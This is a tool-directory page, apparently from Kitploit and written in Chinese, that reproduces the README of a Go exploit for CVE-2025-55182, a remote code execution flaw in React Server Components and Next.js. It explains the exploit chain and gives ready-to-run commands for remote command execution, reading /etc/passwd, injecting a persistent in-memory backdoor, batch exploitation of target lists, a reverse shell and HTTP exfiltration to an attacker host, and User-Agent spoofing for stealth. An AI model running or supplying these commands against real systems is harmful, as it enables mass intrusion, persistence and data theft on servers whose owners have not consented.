Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-golang-PoC — 基于Go的CVE-2025-55182概念验证,这是React Server Components中的一个严重RCE漏洞。具有漏洞检查、命令执行、内存shell注入、反向shell、批量扫描和代理支持,用于授权的安全测试。 | Kitploit
工具/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队远程访问工具Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

基于Go的CVE-2025-55182概念验证,这是React Server Components中的一个严重RCE漏洞。具有漏洞检查、命令执行、内存shell注入、反向shell、批量扫描和代理支持,用于授权的安全测试。

查看仓库网站
6199个月前尚未审核
分享

CVE-2025-55182 React Server Components 远程代码执行 - Go PoC

⚠️ 仅供授权安全测试使用 ⚠️

描述

CVE-2025-55182(又称 CVE-2025-66478)是 React Server Components(Flight 协议)中的一个严重远程代码执行漏洞。本工具是该 PoC 的 Go 实现,用于安全研究和授权渗透测试。

受影响版本:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x(补丁版本之前:15.0.5、15.1.9、15.2.6、15.3.6、15.4.8、15.5.7)
  • Next.js: 16.x(16.0.7 之前)
  • Next.js: 14.3.0-canary.77 及更高版本的 canary 版本

漏洞详情

该漏洞利用 Flight 协议反序列化中的原型污染:

  1. 使用 $@ 反序列化获取 Chunk 引用
  2. 将 Chunk.prototype.then 设置为根对象的 then 属性
  3. 将状态设置为 RESOLVED_MODEL,以受控的伪造 chunk 调用 initializeModelChunk
  4. 触发 Blob 反序列化,该过程使用攻击者载荷调用 response._formData.get
  5. 将 response._formData.get 设置为 Function 构造函数,以实现任意代码执行

功能特性

  • 完整的 RCE 能力 - 执行任意命令并获取输出
  • 漏洞检查模式 - 不进行利用的安全检测
  • Next.js 版本检测 - 自动版本指纹识别
  • 内存 Shell 注入 - 在 /exec?cmd= 处持久化后门
  • 批量扫描 - 支持 JSON 输出的多线程扫描
  • 全面的代理支持:
    • 支持/不支持身份验证的 SOCKS5
    • SOCKS4/SOCKS4a
    • 支持/不支持身份验证的 HTTP/HTTPS 代理
  • 隐身模式 - 浏览器、爬虫、安全 User-Agent
  • 速率限制 - 请求间可配置延迟
  • 反弹 Shell - mkfifo + nc(适用于 Alpine/busybox)
  • 数据外泄 - 通过 HTTP POST 将命令输出发送到攻击者服务器
  • 跨平台构建 - 30 多种操作系统/架构组合
  • JSON 输出 - 面向自动化的机器可读结果

安装

预编译二进制文件

从 GitHub Releases 下载适用于您平台的最新版本。

可用的二进制文件:

  • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
  • Windows: amd64, 386, arm64
  • macOS: amd64 (Intel), arm64 (Apple Silicon)
  • FreeBSD、OpenBSD、NetBSD: amd64, 386, arm, arm64
  • 以及更多...

从源码构建

# Clone repository
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC

# Build for current platform
go build -o cve-2025-55182 .

# Or build for all platforms
chmod +x build.sh
./build.sh

从源码构建

运行 ./build.sh 后,适用于所有受支持平台的二进制文件将位于 build/ 目录中。

使用方法

基本命令

# Check single target for vulnerability
./cve-2025-55182 -u http://target:3000 --check

# Detect Next.js version
./cve-2025-55182 -u http://target:3000 --version-check

# Execute command with output
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"

内存 Shell(持久化后门)

# Inject memory shell (checks if already installed first)
./cve-2025-55182 -u http://target:3000 --memshell

# Test if memory shell is active
./cve-2025-55182 -u http://target:3000 --test-shell

# Execute command via memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"

# After injection, you can also use curl directly:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'

自定义请求头与 SSL 绕过

# Add custom headers (can be used multiple times)
./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'

# Skip SSL certificate verification (for self-signed certs)
./cve-2025-55182 -u https://target:3000 --check -k
./cve-2025-55182 -u https://target:3000 --check --insecure

# Combine with other options
./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080

代理支持

# SOCKS5 with authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080

# SOCKS5 without authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080

# SOCKS4 proxy
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080

# HTTP proxy
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080

批量扫描

# Batch check from file
./cve-2025-55182 --urls targets.txt --check

# Batch scan with JSON output
./cve-2025-55182 --urls targets.txt --check --json -o results.json

# Batch scan with multiple threads and stealth
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s

# Save vulnerable targets to file
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt

# Batch memory shell injection
./cve-2025-55182 --urls targets.txt --memshell --workers 10

# Batch command execution
./cve-2025-55182 --urls targets.txt -c "id" --threads 5

网络外泄

# Reverse shell (mkfifo + nc, works on Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444

# Start listener on attacker machine first:
nc -lvnp 4444

# Exfiltrate command output via HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

# Start listener: nc -lvnp 4444

选项

选项描述
-u, --url目标 URL(例如 http://localhost:3000)
-f, --file包含目标 URL 的文件(每行一个)
--urls-f/--file 的别名
-o, --output漏洞目标的输出文件
--json以 JSON 格式输出结果
-c, --command要执行的命令(带输出)
--check检查漏洞
--version-check检测 Next.js 版本
--proxy代理 URL(socks5://user:pass@ip:port、socks4://ip:port、http://ip:port)
-H, --header自定义请求头(可多次使用)
-k, --insecure跳过 SSL/TLS 证书验证
--stealth隐身模式:browser、crawler、security(默认:browser)
--delay请求之间的延迟(例如 2s、500ms)
--variants使用多个载荷变体进行彻底检查
--memshell注入内存 Shell(持久化后门)
--test-shell测试内存 Shell 是否处于活动状态
--shell-exec通过内存 Shell 执行命令
--revshell IP PORT建立反弹 Shell
--exfil CMD IP PORT执行命令并通过 HTTP POST 输出结果
-t, --timeout请求超时时间(秒)(默认:15)
--threads并发线程数(默认:10)
--workers--threads 的别名
--nocolor禁用彩色输出(适用于 Windows/管道)
-h, --help显示帮助信息
-v, --version显示版本

代理类型

socks5://user:pass@ip:port  - SOCKS5 with authentication
socks5://ip:port            - SOCKS5 without authentication  
socks5h://ip:port           - SOCKS5 with remote DNS resolution
socks4://ip:port            - SOCKS4 proxy
socks4a://ip:port           - SOCKS4a proxy
http://user:pass@ip:port    - HTTP proxy with authentication
http://ip:port              - HTTP proxy without authentication
https://ip:port             - HTTPS proxy

隐身模式

模式描述
browser模拟真实浏览器请求(Chrome、Firefox、Safari、Edge)- 默认
crawler模拟搜索引擎爬虫(Googlebot、Bingbot、Baiduspider 等)
security使用安全扫描器 User-Agent(Nessus、Nuclei)

内存 Shell

内存 Shell 功能注入一个持久化后门,该后门:

  1. 首先检查 - 注入前,验证 Shell 是否已安装
  2. 挂钩 http.Server.prototype.emit - 拦截所有 HTTP 请求
  3. 创建 /exec 端点 - 接受 cmd 查询参数
  4. 在重启前持续存在 - 持久驻留于服务器内存中
# After injection:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=ls+-la'
curl 'http://target:3000/exec?cmd=cat+/etc/passwd'

项目结构

.
├── main.go                   # CLI entry point
├── pkg/
│   ├── colors/
│   │   └── colors.go         # Terminal colors with --nocolor support
│   ├── exploit/
│   │   └── exploit.go        # Core exploit logic, memory shell, version detection
│   ├── proxy/
│   │   └── proxy.go          # SOCKS4/5, HTTP proxy support
│   ├── scanner/
│   │   └── scanner.go        # Batch scanning with JSON output
│   └── stealth/
│       └── stealth.go        # User-Agent randomization
├── build.sh                  # Cross-platform build script
├── go.mod                    # Go module file
├── go.sum                    # Go dependencies
└── README.md                 # This file

跨平台构建

build.sh 脚本可为 30 多个平台构建:

  • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
  • Windows: amd64, 386, arm64 (.exe)
  • macOS: amd64 (Intel)、arm64 (Apple Silicon)
  • FreeBSD: amd64, 386, arm, arm64
  • OpenBSD: amd64, 386, arm, arm64
  • NetBSD: amd64, 386, arm, arm64
  • DragonFly BSD: amd64
  • Solaris/Illumos: amd64
  • Plan 9: amd64, 386
  • AIX: ppc64
chmod +x build.sh
./build.sh

JSON 输出格式

使用 --json 标志时,结果将以 JSONL 格式保存(每行一个 JSON):

{"url":"http://target:3000","vulnerable":true,"version":"15.0.3","checked_at":"2025-12-06T12:00:00Z","response_time_ms":1234}
下载工具